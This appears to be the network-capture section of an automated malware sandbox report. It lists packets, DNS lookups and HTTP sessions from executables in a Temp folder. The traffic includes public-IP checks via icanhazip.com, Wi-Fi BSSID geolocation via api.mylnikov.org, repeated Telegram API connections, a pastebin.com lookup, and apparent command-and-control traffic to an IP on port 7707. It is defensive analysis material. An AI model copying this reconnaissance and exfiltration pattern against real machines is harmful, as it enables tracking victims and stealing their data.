Jun 28, 2024 11:19:52.671119928 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:52.671138048 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.123797894 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.123882055 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.125282049 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.125293016 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.125535965 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.165643930 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.185600996 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.228533030 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.285929918 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.285988092 CEST | 443 | 64796 | 104.21.44.66 | 192.168.2.4
Jun 28, 2024 11:19:53.286040068 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.286755085 CEST | 64796 | 443 | 192.168.2.4 | 104.21.44.66
Jun 28, 2024 11:19:53.289685011 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.289716005 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:53.289778948 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.290338039 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.290354013 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:53.290432930 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:53.296179056 CEST | 80 | 64795 | 104.16.184.241 | 192.168.2.4
Jun 28, 2024 11:19:53.296230078 CEST | 64795 | 80 | 192.168.2.4 | 104.16.184.241
Jun 28, 2024 11:19:53.916601896 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:53.916701078 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.918078899 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.918086052 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:53.918338060 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:53.919872046 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:53.919907093 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.151449919 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.151483059 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.151544094 CEST | 443 | 64797 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.151634932 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.151634932 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.152111053 CEST | 64797 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.158745050 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.158766031 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.158843040 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.159140110 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.159153938 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.767103910 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:54.768774033 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:54.768785000 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.043520927 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.043591022 CEST | 443 | 64798 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.043665886 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.044061899 CEST | 64798 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.151132107 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.151165009 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.151278973 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.153093100 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.153107882 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.747996092 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:55.750154018 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:55.750176907 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.121366978 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.121385098 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122267962 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122272968 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122433901 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122447968 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122500896 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122505903 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122528076 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122535944 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122648001 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122654915 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122719049 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122725010 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122790098 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122797966 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122816086 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122822046 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122833967 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122839928 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122893095 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122900963 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122915030 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122920036 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.122939110 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.122945070 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.123006105 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.123023987 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.123039961 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.123044014 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.134393930 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.134398937 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.248944998 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.306262016 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.948930979 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.949079037 CEST | 443 | 64799 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:56.949430943 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.949748993 CEST | 64799 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:56.959177017 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:56.959202051 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:56.959422112 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:56.959681988 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:56.959693909 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.412270069 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.412467003 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:57.414149046 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:57.414161921 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.414441109 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.416186094 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:57.460504055 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.929563999 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.929657936 CEST | 443 | 64801 | 104.20.4.235 | 192.168.2.4
Jun 28, 2024 11:19:57.929872990 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:57.930247068 CEST | 64801 | 443 | 192.168.2.4 | 104.20.4.235
Jun 28, 2024 11:19:57.931840897 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:57.931875944 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:57.931937933 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:57.932250023 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:57.932266951 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.556966066 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.558763981 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.558780909 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931457996 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931478977 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931585073 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931591988 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931674957 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931684017 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931750059 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931760073 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931766987 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931771994 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931873083 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931883097 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931925058 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.931931973 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.931994915 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.932002068 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.932092905 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.932099104 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
Jun 28, 2024 11:19:58.932136059 CEST | 64802 | 443 | 192.168.2.4 | 149.154.167.220
Jun 28, 2024 11:19:58.932143927 CEST | 443 | 64802 | 149.154.167.220 | 192.168.2.4
                                                                  Jun 28, 2024 11:19:58.932212114 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:19:58.932216883 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:58.932285070 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:19:58.932288885 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:58.932331085 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:19:58.932336092 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:59.131856918 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:59.181467056 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:19:59.587245941 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:59.587538004 CEST44364802149.154.167.220192.168.2.4
                                                                  Jun 28, 2024 11:19:59.587724924 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:19:59.593713045 CEST64802443192.168.2.4149.154.167.220
                                                                  Jun 28, 2024 11:20:06.947629929 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:06.963313103 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:06.963381052 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:06.968413115 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.377319098 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.377990007 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.378061056 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:07.378123999 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.378180027 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:07.379427910 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:07.385435104 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.385490894 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:07.390815020 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.513581991 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:07.556292057 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:21.744366884 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:21.749329090 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:21.749397993 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:21.754219055 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:22.068954945 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:22.118804932 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:22.209074974 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:22.210832119 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:22.215630054 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:22.215728045 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:22.220494986 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:36.541407108 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:36.551347017 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:36.551455975 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:36.556263924 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:36.888567924 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:36.931349993 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:37.022811890 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:37.024290085 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:37.029652119 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:37.029715061 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:37.034895897 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:37.503647089 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:37.556333065 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.341813087 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.346940041 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:51.347002983 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.351902962 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:51.701555967 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:51.743855000 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.823213100 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:51.824860096 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.830817938 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:20:51.830876112 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:20:51.836754084 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:01.853745937 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:01.858720064 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:01.858783960 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:01.863625050 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.184578896 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.243886948 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:02.320681095 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.322499990 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:02.327354908 CEST77074973994.232.249.111192.168.2.4
                                                                  Jun 28, 2024 11:21:02.327759027 CEST497397707192.168.2.494.232.249.111
                                                                  Jun 28, 2024 11:21:02.332566023 CEST77074973994.232.249.111192.168.2.4
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jun 28, 2024 11:19:29.250844002 CEST5349368162.159.36.2192.168.2.4
                                                                  Jun 28, 2024 11:19:29.734436035 CEST6092553192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:29.742516994 CEST53609251.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:38.681802034 CEST4960953192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:38.691098928 CEST53496091.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:38.742041111 CEST6011053192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:38.749572039 CEST53601101.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:39.267792940 CEST6518353192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:39.278939009 CEST53651831.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:40.043652058 CEST4984853192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:40.051337957 CEST53498481.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:52.033472061 CEST5127053192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:52.041289091 CEST53512701.1.1.1192.168.2.4
                                                                  Jun 28, 2024 11:19:56.950659990 CEST5992253192.168.2.41.1.1.1
                                                                  Jun 28, 2024 11:19:56.958442926 CEST53599221.1.1.1192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jun 28, 2024 11:19:29.734436035 CEST | 192.168.2.4 | 1.1.1.1 | 0x9d11 | Standard query (0) | 206.23.85.13.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:38.681802034 CEST | 192.168.2.4 | 1.1.1.1 | 0xe45 | Standard query (0) | 107.143.13.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:38.742041111 CEST | 192.168.2.4 | 1.1.1.1 | 0x9364 | Standard query (0) | icanhazip.com | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:39.267792940 CEST | 192.168.2.4 | 1.1.1.1 | 0xc96f | Standard query (0) | api.mylnikov.org | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:40.043652058 CEST | 192.168.2.4 | 1.1.1.1 | 0xa10c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:52.033472061 CEST | 192.168.2.4 | 1.1.1.1 | 0xa081 | Standard query (0) | 107.143.13.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:56.950659990 CEST | 192.168.2.4 | 1.1.1.1 | 0x676b | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jun 28, 2024 11:19:29.742516994 CEST | 1.1.1.1 | 192.168.2.4 | 0x9d11 | Name error (3) | 206.23.85.13.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:38.691098928 CEST | 1.1.1.1 | 192.168.2.4 | 0xe45 | Name error (3) | 107.143.13.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:38.749572039 CEST | 1.1.1.1 | 192.168.2.4 | 0x9364 | No error (0) | icanhazip.com | | 104.16.184.241 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:38.749572039 CEST | 1.1.1.1 | 192.168.2.4 | 0x9364 | No error (0) | icanhazip.com | | 104.16.185.241 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:39.278939009 CEST | 1.1.1.1 | 192.168.2.4 | 0xc96f | No error (0) | api.mylnikov.org | | 104.21.44.66 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:39.278939009 CEST | 1.1.1.1 | 192.168.2.4 | 0xc96f | No error (0) | api.mylnikov.org | | 172.67.196.114 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:40.051337957 CEST | 1.1.1.1 | 192.168.2.4 | 0xa10c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:52.041289091 CEST | 1.1.1.1 | 192.168.2.4 | 0xa081 | Name error (3) | 107.143.13.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Jun 28, 2024 11:19:56.958442926 CEST | 1.1.1.1 | 192.168.2.4 | 0x676b | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:56.958442926 CEST | 1.1.1.1 | 192.168.2.4 | 0x676b | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Jun 28, 2024 11:19:56.958442926 CEST | 1.1.1.1 | 192.168.2.4 | 0x676b | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
• api.mylnikov.org
• api.telegram.org
• pastebin.com
• icanhazip.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 64788 | 104.16.184.241 | 80 | 4884 | C:\Users\user\AppData\Local\Temp\udwnme.exe
Timestamp | Bytes transferred | Direction | Data
Jun 28, 2024 11:19:38.758981943 CEST | 63 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Jun 28, 2024 11:19:39.202603102 CEST | 534 | IN | HTTP/1.1 200 OK
Date: Fri, 28 Jun 2024 09:19:39 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=q4oOtR63przvD.lOtDlk74ZIoFQ3V4br1u5OsBlV8T0-1719566379-1.0.1.1-hN7kPbPMeiEpcNc7sdarBef9HB.N8XSgmT1OHkR8itxPaknwelcEP_mA7El7CJeIlZ_jQ4Pk8IYH1l23LLa4DA; path=/; expires=Fri, 28-Jun-24 09:49:39 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 89ac98adbc316a57-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 64795 | 104.16.184.241 | 80 | 5052 | C:\Users\user\AppData\Local\Temp\luglzv.exe
Timestamp | Bytes transferred | Direction | Data
Jun 28, 2024 11:19:52.143790007 CEST | 63 | OUT | GET / HTTP/1.1
Host: icanhazip.com
Connection: Keep-Alive
Jun 28, 2024 11:19:52.609555006 CEST | 534 | IN | HTTP/1.1 200 OK
Date: Fri, 28 Jun 2024 09:19:52 GMT
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET
Set-Cookie: __cf_bm=nZTlFmZR9jTHqFBOV8Bqgfg6UBRRAvYuZxiuyjenBOs-1719566392-1.0.1.1-iFRPiyl39DR.mxkxHWHbXbLeGcyH4A3XrKXGlmLXqYQhdzA9QHssJb7vd3p10yl6K6VxAWdUPjIiWuCbJ3wt1Q; path=/; expires=Fri, 28-Jun-24 09:49:52 GMT; domain=.icanhazip.com; HttpOnly
Server: cloudflare
CF-RAY: 89ac99017ef74334-EWR
alt-svc: h3=":443"; ma=86400
Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 0a
Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 64790 | 104.21.44.66 | 443 | 4884 | C:\Users\user\AppData\Local\Temp\udwnme.exe
Timestamp | Bytes transferred | Direction | Data
2024-06-28 09:19:39 UTC | 112 | OUT | GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1
Host: api.mylnikov.org
Connection: Keep-Alive
2024-06-28 09:19:40 UTC | 797 | IN | HTTP/1.1 200 OK
Date: Fri, 28 Jun 2024 09:19:39 GMT
Content-Type: application/json; charset=utf8
Content-Length: 88
Connection: close
Access-Control-Allow-Origin: *
Cache-Control: max-age=2678400
CF-Cache-Status: HIT
Age: 8474
Last-Modified: Fri, 28 Jun 2024 06:58:25 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a3qNjNgONpb%2F%2FQwiS3LqKqJZz3uq6%2FWtOjVouUpm0DMEt77BeL6cdmBgHqOlqL3F%2BLHG%2BJZMD7p3%2BOB7wn0R8IzXTABghmxbpFIx6RBTO2g9K1WG4Ipq3cVE%2FXKmkDHsGwI2"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=0; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 89ac98b2e8f3726e-EWR
alt-svc: h3=":443"; ma=86400
